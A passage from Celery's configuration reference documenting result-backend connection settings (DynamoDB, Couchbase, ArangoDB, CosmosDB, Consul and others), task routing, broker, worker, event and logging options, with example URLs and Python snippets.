versionadded:: 5.1 Default: None. A base path in the storage container to use to store result keys. For example:: azureblockblob_base_path = 'prefix/' .. setting:: azureblockblob_retry_initial_backoff_sec ``azureblockblob_retry_initial_backoff_sec`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 2. The initial backoff interval, in seconds, for the first retry. Subsequent retries are attempted with an exponential strategy. .. setting:: azureblockblob_retry_increment_base ``azureblockblob_retry_increment_base`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 2. .. setting:: azureblockblob_retry_max_attempts ``azureblockblob_retry_max_attempts`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 3. The maximum number of retry attempts. .. setting:: azureblockblob_connection_timeout ``azureblockblob_connection_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 20. Timeout in seconds for establishing the azure block blob connection. .. setting:: azureblockblob_read_timeout ``azureblockblob_read_timeout`` ~~~~~~~~~~~~~~~~~~~~ Default: 120. Timeout in seconds for reading of an azure block blob. .. _conf-elasticsearch-result-backend: Elasticsearch backend settings ------------------------------ To use `Elasticsearch`_ as the result backend you simply need to configure the :setting:`result_backend` setting with the correct URL. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'elasticsearch://example.com:9200/index_name/doc_type' .. setting:: elasticsearch_retry_on_timeout ``elasticsearch_retry_on_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`False` Should timeout trigger a retry on different node? .. setting:: elasticsearch_max_retries ``elasticsearch_max_retries`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 3. Maximum number of retries before an exception is propagated. .. setting:: elasticsearch_timeout ``elasticsearch_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 10.0 seconds. Global timeout,used by the elasticsearch result backend. .. setting:: elasticsearch_save_meta_as_text ``elasticsearch_save_meta_as_text`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: :const:`True` Should meta saved as text or as native json. Result is always serialized as text. .. _conf-dynamodb-result-backend: AWS DynamoDB backend settings ----------------------------- .. note:: The Dynamodb backend requires the :pypi:`boto3` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[dynamodb] See :ref:`bundles` for information on combining multiple extension requirements. .. warning:: The Dynamodb backend is not compatible with tables that have a sort key defined. If you want to query the results table based on something other than the partition key, please define a global secondary index (GSI) instead. This backend requires the :setting:`result_backend` setting to be set to a DynamoDB URL:: result_backend = 'dynamodb://aws_access_key_id:aws_secret_access_key@region:port/table?read=n&write=m' For example, specifying the AWS region and the table name:: result_backend = 'dynamodb://@us-east-1/celery_results' or retrieving AWS configuration parameters from the environment, using the default table name (``celery``) and specifying read and write provisioned throughput:: result_backend = 'dynamodb://@/?read=5&write=5' or using the `downloadable version `_ of DynamoDB `locally `_:: result_backend = 'dynamodb://@localhost:8000' or using downloadable version or other service with conforming API deployed on any host:: result_backend = 'dynamodb://@us-east-1' dynamodb_endpoint_url = 'http://192.168.0.40:8000' The fields of the DynamoDB URL in ``result_backend`` are defined as follows: #. ``aws_access_key_id & aws_secret_access_key`` The credentials for accessing AWS API resources. These can also be resolved by the :pypi:`boto3` library from various sources, as described `here `_. #. ``region`` The AWS region, e.g. ``us-east-1`` or ``localhost`` for the `Downloadable Version `_. See the :pypi:`boto3` library `documentation `_ for definition options. #. ``port`` The listening port of the local DynamoDB instance, if you are using the downloadable version. If you have not specified the ``region`` parameter as ``localhost``, setting this parameter has **no effect**. #. ``table`` Table name to use. Default is ``celery``. See the `DynamoDB Naming Rules `_ for information on the allowed characters and length. #. ``read & write`` The Read & Write Capacity Units for the created DynamoDB table. Default is ``1`` for both read and write. More details can be found in the `Provisioned Throughput documentation `_. #. ``ttl_seconds`` Time-to-live (in seconds) for results before they expire. The default is to not expire results, while also leaving the DynamoDB table's Time to Live settings untouched. If ``ttl_seconds`` is set to a positive value, results will expire after the specified number of seconds. Setting ``ttl_seconds`` to a negative value means to not expire results, and also to actively disable the DynamoDB table's Time to Live setting. Note that trying to change a table's Time to Live setting multiple times in quick succession will cause a throttling error. More details can be found in the `DynamoDB TTL documentation `_ .. _conf-ironcache-result-backend: IronCache backend settings -------------------------- .. note:: The IronCache backend requires the :pypi:`iron_celery` library: To install this package use :command:`pip`: .. code-block:: console $ pip install iron_celery IronCache is configured via the URL provided in :setting:`result_backend`, for example:: result_backend = 'ironcache://project_id:token@' Or to change the cache name:: ironcache:://project_id:token@/awesomecache For more information, see: https://github.com/iron-io/iron_celery .. _conf-couchbase-result-backend: Couchbase backend settings -------------------------- .. note:: The Couchbase backend requires the :pypi:`couchbase` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[couchbase] See :ref:`bundles` for instructions how to combine multiple extension requirements. This backend can be configured via the :setting:`result_backend` set to a Couchbase URL: .. code-block:: python result_backend = 'couchbase://username:password@host:port/bucket' .. setting:: couchbase_backend_settings ``couchbase_backend_settings`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). This is a dict supporting the following keys: * ``host`` Host name of the Couchbase server. Defaults to ``localhost``. * ``port`` The port the Couchbase server is listening to. Defaults to ``8091``. * ``bucket`` The default bucket the Couchbase server is writing to. Defaults to ``default``. * ``username`` User name to authenticate to the Couchbase server as (optional). * ``password`` Password to authenticate to the Couchbase server (optional). .. _conf-arangodb-result-backend: ArangoDB backend settings -------------------------- .. note:: The ArangoDB backend requires the :pypi:`pyArango` library. To install this package use :command:`pip`: .. code-block:: console $ pip install celery[arangodb] See :ref:`bundles` for instructions how to combine multiple extension requirements. This backend can be configured via the :setting:`result_backend` set to a ArangoDB URL: .. code-block:: python result_backend = 'arangodb://username:password@host:port/database/collection' .. setting:: arangodb_backend_settings ``arangodb_backend_settings`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``{}`` (empty mapping). This is a dict supporting the following keys: * ``host`` Host name of the ArangoDB server. Defaults to ``localhost``. * ``port`` The port the ArangoDB server is listening to. Defaults to ``8529``. * ``database`` The default database in the ArangoDB server is writing to. Defaults to ``celery``. * ``collection`` The default collection in the ArangoDB servers database is writing to. Defaults to ``celery``. * ``username`` User name to authenticate to the ArangoDB server as (optional). * ``password`` Password to authenticate to the ArangoDB server (optional). * ``http_protocol`` HTTP Protocol in ArangoDB server connection. Defaults to ``http``. * ``verify`` HTTPS Verification check while creating the ArangoDB connection. Defaults to ``False``. .. _conf-cosmosdbsql-result-backend: CosmosDB backend settings (experimental) ---------------------------------------- To use `CosmosDB`_ as the result backend, you simply need to configure the :setting:`result_backend` setting with the correct URL. Example configuration ~~~~~~~~~~~~~~~~~~~~~ .. code-block:: python result_backend = 'cosmosdbsql://:{InsertAccountPrimaryKeyHere}@{InsertAccountNameHere}.documents.azure.com' .. setting:: cosmosdbsql_database_name ``cosmosdbsql_database_name`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: celerydb. The name for the database in which to store the results. .. setting:: cosmosdbsql_collection_name ``cosmosdbsql_collection_name`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: celerycol. The name of the collection in which to store the results. .. setting:: cosmosdbsql_consistency_level ``cosmosdbsql_consistency_level`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Session. Represents the consistency levels supported for Azure Cosmos DB client operations. Consistency levels by order of strength are: Strong, BoundedStaleness, Session, ConsistentPrefix and Eventual. .. setting:: cosmosdbsql_max_retry_attempts ``cosmosdbsql_max_retry_attempts`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 9. Maximum number of retries to be performed for a request. .. setting:: cosmosdbsql_max_retry_wait_time ``cosmosdbsql_max_retry_wait_time`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 30. Maximum wait time in seconds to wait for a request while the retries are happening. .. _conf-couchdb-result-backend: CouchDB backend settings ------------------------ .. note:: The CouchDB backend requires the :pypi:`pycouchdb` library: To install this Couchbase package use :command:`pip`: .. code-block:: console $ pip install celery[couchdb] See :ref:`bundles` for information on combining multiple extension requirements. This backend can be configured via the :setting:`result_backend` set to a CouchDB URL:: result_backend = 'couchdb://username:password@host:port/container' The URL is formed out of the following parts: * ``username`` User name to authenticate to the CouchDB server as (optional). * ``password`` Password to authenticate to the CouchDB server (optional). * ``host`` Host name of the CouchDB server. Defaults to ``localhost``. * ``port`` The port the CouchDB server is listening to. Defaults to ``8091``. * ``container`` The default container the CouchDB server is writing to. Defaults to ``default``. .. _conf-filesystem-result-backend: File-system backend settings ---------------------------- This backend can be configured using a file URL, for example:: CELERY_RESULT_BACKEND = 'file:///var/celery/results' The configured directory needs to be shared and writable by all servers using the backend. If you're trying Celery on a single system you can simply use the backend without any further configuration. For larger clusters you could use NFS, `GlusterFS`_, CIFS, `HDFS`_ (using FUSE), or any other file-system. .. _`GlusterFS`: http://www.gluster.org/ .. _`HDFS`: http://hadoop.apache.org/ .. _conf-consul-result-backend: Consul K/V store backend settings --------------------------------- .. note:: The Consul backend requires the :pypi:`python-consul2` library: To install this package use :command:`pip`: .. code-block:: console $ pip install python-consul2 The Consul backend can be configured using a URL, for example:: CELERY_RESULT_BACKEND = 'consul://localhost:8500/' or:: result_backend = 'consul://localhost:8500/' The backend will store results in the K/V store of Consul as individual keys. The backend supports auto expire of results using TTLs in Consul. The full syntax of the URL is:: consul://host:port[?one_client=1] The URL is formed out of the following parts: * ``host`` Host name of the Consul server. * ``port`` The port the Consul server is listening to. * ``one_client`` By default, for correctness, the backend uses a separate client connection per operation. In cases of extreme load, the rate of creation of new connections can cause HTTP 429 "too many connections" error responses from the Consul server when under load. The recommended way to handle this is to enable retries in ``python-consul2`` using the patch at https://github.com/poppyred/python-consul2/pull/31. Alternatively, if ``one_client`` is set, a single client connection will be used for all operations instead. This should eliminate the HTTP 429 errors, but the storage of results in the backend can become unreliable. .. _conf-messaging: Message Routing --------------- .. _conf-messaging-routing: .. setting:: task_queues ``task_queues`` ~~~~~~~~~~~~~~~ Default: :const:`None` (queue taken from default queue settings). Most users will not want to specify this setting and should rather use the :ref:`automatic routing facilities `. If you really want to configure advanced routing, this setting should be a list of :class:`kombu.Queue` objects the worker will consume from. Note that workers can be overridden this setting via the :option:`-Q ` option, or individual queues from this list (by name) can be excluded using the :option:`-X ` option. Also see :ref:`routing-basics` for more information. The default is a queue/exchange/binding key of ``celery``, with exchange type ``direct``. See also :setting:`task_routes` .. setting:: task_routes ``task_routes`` ~~~~~~~~~~~~~~~ Default: :const:`None`. A list of routers, or a single router used to route tasks to queues. When deciding the final destination of a task the routers are consulted in order. A router can be specified as either: * A function with the signature ``(name, args, kwargs, options, task=None, **kwargs)`` * A string providing the path to a router function. * A dict containing router specification: Will be converted to a :class:`celery.routes.MapRoute` instance. * A list of ``(pattern, route)`` tuples: Will be converted to a :class:`celery.routes.MapRoute` instance. Examples: .. code-block:: python task_routes = { 'celery.ping': 'default', 'mytasks.add': 'cpu-bound', 'feed.tasks.*': 'feeds', # <-- glob pattern re.compile(r'(image|video)\.tasks\..*'): 'media', # <-- regex 'video.encode': { 'queue': 'video', 'exchange': 'media', 'routing_key': 'media.video.encode', }, } task_routes = ('myapp.tasks.route_task', {'celery.ping': 'default'}) Where ``myapp.tasks.route_task`` could be: .. code-block:: python def route_task(self, name, args, kwargs, options, task=None, **kw): if task == 'celery.ping': return {'queue': 'default'} ``route_task`` may return a string or a dict. A string then means it's a queue name in :setting:`task_queues`, a dict means it's a custom route. When sending tasks, the routers are consulted in order. The first router that doesn't return ``None`` is the route to use. The message options is then merged with the found route settings, where the task's settings have priority. Example if :func:`~celery.execute.apply_async` has these arguments: .. code-block:: python Task.apply_async(immediate=False, exchange='video', routing_key='video.compress') and a router returns: .. code-block:: python {'immediate': True, 'exchange': 'urgent'} the final message options will be: .. code-block:: python immediate=False, exchange='video', routing_key='video.compress' (and any default message options defined in the :class:`~celery.app.task.Task` class) Values defined in :setting:`task_routes` have precedence over values defined in :setting:`task_queues` when merging the two. With the follow settings: .. code-block:: python task_queues = { 'cpubound': { 'exchange': 'cpubound', 'routing_key': 'cpubound', }, } task_routes = { 'tasks.add': { 'queue': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json', }, } The final routing options for ``tasks.add`` will become: .. code-block:: javascript {'exchange': 'cpubound', 'routing_key': 'tasks.add', 'serializer': 'json'} See :ref:`routers` for more examples. .. setting:: task_queue_max_priority ``task_queue_max_priority`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :brokers: RabbitMQ Default: :const:`None`. See :ref:`routing-options-rabbitmq-priorities`. .. setting:: task_default_priority ``task_default_priority`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ :brokers: RabbitMQ, Redis Default: :const:`None`. See :ref:`routing-options-rabbitmq-priorities`. .. setting:: task_inherit_parent_priority ``task_inherit_parent_priority`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :brokers: RabbitMQ Default: :const:`False`. If enabled, child tasks will inherit priority of the parent task. .. code-block:: python # The last task in chain will also have priority set to 5. chain = celery.chain(add.s(2) | add.s(2).set(priority=5) | add.s(3)) Priority inheritance also works when calling child tasks from a parent task with `delay` or `apply_async`. See :ref:`routing-options-rabbitmq-priorities`. .. setting:: worker_direct ``worker_direct`` ~~~~~~~~~~~~~~~~~ Default: Disabled. This option enables so that every worker has a dedicated queue, so that tasks can be routed to specific workers. The queue name for each worker is automatically generated based on the worker hostname and a ``.dq`` suffix, using the ``C.dq`` exchange. For example the queue name for the worker with node name ``w1@example.com`` becomes:: w1@example.com.dq Then you can route the task to the task by specifying the hostname as the routing key and the ``C.dq`` exchange:: task_routes = { 'tasks.add': {'exchange': 'C.dq', 'routing_key': 'w1@example.com'} } .. setting:: task_create_missing_queues ``task_create_missing_queues`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled. If enabled (default), any queues specified that aren't defined in :setting:`task_queues` will be automatically created. See :ref:`routing-automatic`. .. setting:: task_default_queue ``task_default_queue`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celery"``. The name of the default queue used by `.apply_async` if the message has no route or no custom queue has been specified. This queue must be listed in :setting:`task_queues`. If :setting:`task_queues` isn't specified then it's automatically created containing one queue entry, where this name is used as the name of that queue. .. seealso:: :ref:`routing-changing-default-queue` .. setting:: task_default_exchange ``task_default_exchange`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Uses the value set for :setting:`task_default_queue`. Name of the default exchange to use when no custom exchange is specified for a key in the :setting:`task_queues` setting. .. setting:: task_default_exchange_type ``task_default_exchange_type`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"direct"``. Default exchange type used when no custom exchange type is specified for a key in the :setting:`task_queues` setting. .. setting:: task_default_routing_key ``task_default_routing_key`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Uses the value set for :setting:`task_default_queue`. The default routing key used when no custom routing key is specified for a key in the :setting:`task_queues` setting. .. setting:: task_default_delivery_mode ``task_default_delivery_mode`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"persistent"``. Can be `transient` (messages not written to disk) or `persistent` (written to disk). .. _conf-broker-settings: Broker Settings --------------- .. setting:: broker_url ``broker_url`` ~~~~~~~~~~~~~~ Default: ``"amqp://"`` Default broker URL. This must be a URL in the form of:: transport://userid:password@hostname:port/virtual_host Only the scheme part (``transport://``) is required, the rest is optional, and defaults to the specific transports default values. The transport part is the broker implementation to use, and the default is ``amqp``, (uses ``librabbitmq`` if installed or falls back to ``pyamqp``). There are also other choices available, including; ``redis://``, ``sqs://``, and ``qpid://``. The scheme can also be a fully qualified path to your own transport implementation:: broker_url = 'proj.transports.MyTransport://localhost' More than one broker URL, of the same transport, can also be specified. The broker URLs can be passed in as a single string that's semicolon delimited:: broker_url = 'transport://userid:password@hostname:port//;transport://userid:password@hostname:port//' Or as a list:: broker_url = [ 'transport://userid:password@localhost:port//', 'transport://userid:password@hostname:port//' ] The brokers will then be used in the :setting:`broker_failover_strategy`. See :ref:`kombu:connection-urls` in the Kombu documentation for more information. .. setting:: broker_read_url .. setting:: broker_write_url ``broker_read_url`` / ``broker_write_url`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Taken from :setting:`broker_url`. These settings can be configured, instead of :setting:`broker_url` to specify different connection parameters for broker connections used for consuming and producing. Example:: broker_read_url = 'amqp://user:pass@broker.example.com:56721' broker_write_url = 'amqp://user:pass@broker.example.com:56722' Both options can also be specified as a list for failover alternates, see :setting:`broker_url` for more information. .. setting:: broker_failover_strategy ``broker_failover_strategy`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"round-robin"``. Default failover strategy for the broker Connection object. If supplied, may map to a key in 'kombu.connection.failover_strategies', or be a reference to any method that yields a single item from a supplied list. Example:: # Random failover strategy def random_failover_strategy(servers): it = list(servers) # don't modify callers list shuffle = random.shuffle for _ in repeat(None): shuffle(it) yield it[0] broker_failover_strategy = random_failover_strategy .. setting:: broker_heartbeat ``broker_heartbeat`` ~~~~~~~~~~~~~~~~~~~~ :transports supported: ``pyamqp`` Default: ``120.0`` (negotiated by server). Note: This value is only used by the worker, clients do not use a heartbeat at the moment. It's not always possible to detect connection loss in a timely manner using TCP/IP alone, so AMQP defines something called heartbeats that's is used both by the client and the broker to detect if a connection was closed. If the heartbeat value is 10 seconds, then the heartbeat will be monitored at the interval specified by the :setting:`broker_heartbeat_checkrate` setting (by default this is set to double the rate of the heartbeat value, so for the 10 seconds, the heartbeat is checked every 5 seconds). .. setting:: broker_heartbeat_checkrate ``broker_heartbeat_checkrate`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ :transports supported: ``pyamqp`` Default: 2.0. At intervals the worker will monitor that the broker hasn't missed too many heartbeats. The rate at which this is checked is calculated by dividing the :setting:`broker_heartbeat` value with this value, so if the heartbeat is 10.0 and the rate is the default 2.0, the check will be performed every 5 seconds (twice the heartbeat sending rate). .. setting:: broker_use_ssl ``broker_use_ssl`` ~~~~~~~~~~~~~~~~~~ :transports supported: ``pyamqp``, ``redis`` Default: Disabled. Toggles SSL usage on broker connection and SSL settings. The valid values for this option vary by transport. ``pyamqp`` __________ If ``True`` the connection will use SSL with default SSL settings. If set to a dict, will configure SSL connection according to the specified policy. The format used is Python's :func:`ssl.wrap_socket` options. Note that SSL socket is generally served on a separate port by the broker. Example providing a client cert and validating the server cert against a custom certificate authority: .. code-block:: python import ssl broker_use_ssl = { 'keyfile': '/var/ssl/private/worker-key.pem', 'certfile': '/var/ssl/amqp-server-cert.pem', 'ca_certs': '/var/ssl/myca.pem', 'cert_reqs': ssl.CERT_REQUIRED } .. warning:: Be careful using ``broker_use_ssl=True``. It's possible that your default configuration won't validate the server cert at all. Please read Python `ssl module security considerations `_. ``redis`` _________ The setting must be a dict with the following keys: * ``ssl_cert_reqs`` (required): one of the ``SSLContext.verify_mode`` values: * ``ssl.CERT_NONE`` * ``ssl.CERT_OPTIONAL`` * ``ssl.CERT_REQUIRED`` * ``ssl_ca_certs`` (optional): path to the CA certificate * ``ssl_certfile`` (optional): path to the client certificate * ``ssl_keyfile`` (optional): path to the client key .. setting:: broker_pool_limit ``broker_pool_limit`` ~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.3 Default: 10. The maximum number of connections that can be open in the connection pool. The pool is enabled by default since version 2.5, with a default limit of ten connections. This number can be tweaked depending on the number of threads/green-threads (eventlet/gevent) using a connection. For example running eventlet with 1000 greenlets that use a connection to the broker, contention can arise and you should consider increasing the limit. If set to :const:`None` or 0 the connection pool will be disabled and connections will be established and closed for every use. .. setting:: broker_connection_timeout ``broker_connection_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 4.0. The default timeout in seconds before we give up establishing a connection to the AMQP server. This setting is disabled when using gevent. .. note:: The broker connection timeout only applies to a worker attempting to connect to the broker. It does not apply to producer sending a task, see :setting:`broker_transport_options` for how to provide a timeout for that situation. .. setting:: broker_connection_retry ``broker_connection_retry`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled. Automatically try to re-establish the connection to the AMQP broker if lost. The time between retries is increased for each retry, and is not exhausted before :setting:`broker_connection_max_retries` is exceeded. .. setting:: broker_connection_max_retries ``broker_connection_max_retries`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 100. Maximum number of retries before we give up re-establishing a connection to the AMQP broker. If this is set to :const:`0` or :const:`None`, we'll retry forever. .. setting:: broker_login_method ``broker_login_method`` ~~~~~~~~~~~~~~~~~~~~~~~ Default: ``"AMQPLAIN"``. Set custom amqp login method. .. setting:: broker_transport_options ``broker_transport_options`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: ``{}`` (empty mapping). A dict of additional options passed to the underlying transport. See your transport user manual for supported options (if any). Example setting the visibility timeout (supported by Redis and SQS transports): .. code-block:: python broker_transport_options = {'visibility_timeout': 18000} # 5 hours Example setting the producer connection maximum number of retries (so producers won't retry forever if the broker isn't available at the first task execution): .. code-block:: python broker_transport_options = {'max_retries': 5} .. _conf-worker: Worker ------ .. setting:: imports ``imports`` ~~~~~~~~~~~ Default: ``[]`` (empty list). A sequence of modules to import when the worker starts. This is used to specify the task modules to import, but also to import signal handlers and additional remote control commands, etc. The modules will be imported in the original order. .. setting:: include ``include`` ~~~~~~~~~~~ Default: ``[]`` (empty list). Exact same semantics as :setting:`imports`, but can be used as a means to have different import categories. The modules in this setting are imported after the modules in :setting:`imports`. .. setting:: worker_deduplicate_successful_tasks ``worker_deduplicate_successful_tasks`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 5.1 Default: False Before each task execution, instruct the worker to check if this task is a duplicate message. Deduplication occurs only with tasks that have the same identifier, enabled late acknowledgment, were redelivered by the message broker and their state is ``SUCCESS`` in the result backend. To avoid overflowing the result backend with queries, a local cache of successfully executed tasks is checked before querying the result backend in case the task was already successfully executed by the same worker that received the task. This cache can be made persistent by setting the :setting:`worker_state_db` setting. If the result backend is not persistent (the RPC backend, for example), this setting is ignored. .. _conf-concurrency: .. setting:: worker_concurrency ``worker_concurrency`` ~~~~~~~~~~~~~~~~~~~~~~ Default: Number of CPU cores. The number of concurrent worker processes/threads/green threads executing tasks. If you're doing mostly I/O you can have more processes, but if mostly CPU-bound, try to keep it close to the number of CPUs on your machine. If not set, the number of CPUs/cores on the host will be used. .. setting:: worker_prefetch_multiplier ``worker_prefetch_multiplier`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 4. How many messages to prefetch at a time multiplied by the number of concurrent processes. The default is 4 (four messages for each process). The default setting is usually a good choice, however -- if you have very long running tasks waiting in the queue and you have to start the workers, note that the first worker to start will receive four times the number of messages initially. Thus the tasks may not be fairly distributed to the workers. To disable prefetching, set :setting:`worker_prefetch_multiplier` to 1. Changing that setting to 0 will allow the worker to keep consuming as many messages as it wants. For more on prefetching, read :ref:`optimizing-prefetch-limit` .. note:: Tasks with ETA/countdown aren't affected by prefetch limits. .. setting:: worker_lost_wait ``worker_lost_wait`` ~~~~~~~~~~~~~~~~~~~~ Default: 10.0 seconds. In some cases a worker may be killed without proper cleanup, and the worker may have published a result before terminating. This value specifies how long we wait for any missing results before raising a :exc:`@WorkerLostError` exception. .. setting:: worker_max_tasks_per_child ``worker_max_tasks_per_child`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Maximum number of tasks a pool worker process can execute before it's replaced with a new one. Default is no limit. .. setting:: worker_max_memory_per_child ``worker_max_memory_per_child`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: No limit. Type: int (kilobytes) Maximum amount of resident memory, in kilobytes, that may be consumed by a worker before it will be replaced by a new worker. If a single task causes a worker to exceed this limit, the task will be completed, and the worker will be replaced afterwards. Example: .. code-block:: python worker_max_memory_per_child = 12000 # 12MB .. setting:: worker_disable_rate_limits ``worker_disable_rate_limits`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled (rate limits enabled). Disable all rate limits, even if tasks has explicit rate limits set. .. setting:: worker_state_db ``worker_state_db`` ~~~~~~~~~~~~~~~~~~~ Default: :const:`None`. Name of the file used to stores persistent worker state (like revoked tasks). Can be a relative or absolute path, but be aware that the suffix `.db` may be appended to the file name (depending on Python version). Can also be set via the :option:`celery worker --statedb` argument. .. setting:: worker_timer_precision ``worker_timer_precision`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 1.0 seconds. Set the maximum time in seconds that the ETA scheduler can sleep between rechecking the schedule. Setting this value to 1 second means the schedulers precision will be 1 second. If you need near millisecond precision you can set this to 0.1. .. setting:: worker_enable_remote_control ``worker_enable_remote_control`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled by default. Specify if remote control of the workers is enabled. .. setting:: worker_proc_alive_timeout ``worker_proc_alive_timeout`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 4.0. The timeout in seconds (int/float) when waiting for a new worker process to start up. .. setting:: worker_cancel_long_running_tasks_on_connection_loss ``worker_cancel_long_running_tasks_on_connection_loss`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 5.1 Default: Disabled by default. Kill all long-running tasks with late acknowledgment enabled on connection loss. Tasks which have not been acknowledged before the connection loss cannot do so anymore since their channel is gone and the task is redelivered back to the queue. This is why tasks with late acknowledged enabled must be idempotent as they may be executed more than once. In this case, the task is being executed twice per connection loss (and sometimes in parallel in other workers). When turning this option on, those tasks which have not been completed are cancelled and their execution is terminated. Tasks which have completed in any way before the connection loss are recorded as such in the result backend as long as :setting:`task_ignore_result` is not enabled. .. warning:: This feature was introduced as a future breaking change. If it is turned off, Celery will emit a warning message. In Celery 6.0, the :setting:`worker_cancel_long_running_tasks_on_connection_loss` will be set to ``True`` by default as the current behavior leads to more problems than it solves. .. _conf-events: Events ------ .. setting:: worker_send_task_events ``worker_send_task_events`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Disabled by default. Send task-related events so that tasks can be monitored using tools like `flower`. Sets the default value for the workers :option:`-E ` argument. .. setting:: task_send_sent_event ``task_send_sent_event`` ~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: Disabled by default. If enabled, a :event:`task-sent` event will be sent for every task so tasks can be tracked before they're consumed by a worker. .. setting:: event_queue_ttl ``event_queue_ttl`` ~~~~~~~~~~~~~~~~~~~ :transports supported: ``amqp`` Default: 5.0 seconds. Message expiry time in seconds (int/float) for when messages sent to a monitor clients event queue is deleted (``x-message-ttl``) For example, if this value is set to 10 then a message delivered to this queue will be deleted after 10 seconds. .. setting:: event_queue_expires ``event_queue_expires`` ~~~~~~~~~~~~~~~~~~~~~~~ :transports supported: ``amqp`` Default: 60.0 seconds. Expiry time in seconds (int/float) for when after a monitor clients event queue will be deleted (``x-expires``). .. setting:: event_queue_prefix ``event_queue_prefix`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celeryev"``. The prefix to use for event receiver queue names. .. setting:: event_exchange ``event_exchange`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celeryev"``. Name of the event exchange. .. warning:: This option is in experimental stage, please use it with caution. .. setting:: event_serializer ``event_serializer`` ~~~~~~~~~~~~~~~~~~~~ Default: ``"json"``. Message serialization format used when sending event messages. .. seealso:: :ref:`calling-serializers`. .. _conf-control: Remote Control Commands ----------------------- .. note:: To disable remote control commands see the :setting:`worker_enable_remote_control` setting. .. setting:: control_queue_ttl ``control_queue_ttl`` ~~~~~~~~~~~~~~~~~~~~~ Default: 300.0 Time in seconds, before a message in a remote control command queue will expire. If using the default of 300 seconds, this means that if a remote control command is sent and no worker picks it up within 300 seconds, the command is discarded. This setting also applies to remote control reply queues. .. setting:: control_queue_expires ``control_queue_expires`` ~~~~~~~~~~~~~~~~~~~~~~~~~ Default: 10.0 Time in seconds, before an unused remote control command queue is deleted from the broker. This setting also applies to remote control reply queues. .. setting:: control_exchange ``control_exchange`` ~~~~~~~~~~~~~~~~~~~~~~ Default: ``"celery"``. Name of the control command exchange. .. warning:: This option is in experimental stage, please use it with caution. .. _conf-logging: Logging ------- .. setting:: worker_hijack_root_logger ``worker_hijack_root_logger`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 2.2 Default: Enabled by default (hijack root logger). By default any previously configured handlers on the root logger will be removed. If you want to customize your own logging handlers, then you can disable this behavior by setting `worker_hijack_root_logger = False`. .. note:: Logging can also be customized by connecting to the :signal:`celery.signals.setup_logging` signal. .. setting:: worker_log_color ``worker_log_color`` ~~~~~~~~~~~~~~~~~~~~ Default: Enabled if app is logging to a terminal. Enables/disables colors in logging output by the Celery apps. .. setting:: worker_log_format ``worker_log_format`` ~~~~~~~~~~~~~~~~~~~~~ Default: .. code-block:: text "[%(asctime)s: %(levelname)s/%(processName)s] %(message)s" The format to use for log messages. See the Python :mod:`logging` module for more information about log formats. .. setting:: worker_task_log_format ``worker_task_log_format`` ~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: .. code-block:: text "[%(asctime)s: %(levelname)s/%(processName)s] %(task_name)s[%(task_id)s]: %(message)s" The format to use for log messages logged in tasks. See the Python :mod:`logging` module for more information about log formats. .. setting:: worker_redirect_stdouts ``worker_redirect_stdouts`` ~~~~~~~~~~~~~~~~~~~~~~~~~~~ Default: Enabled by default. If 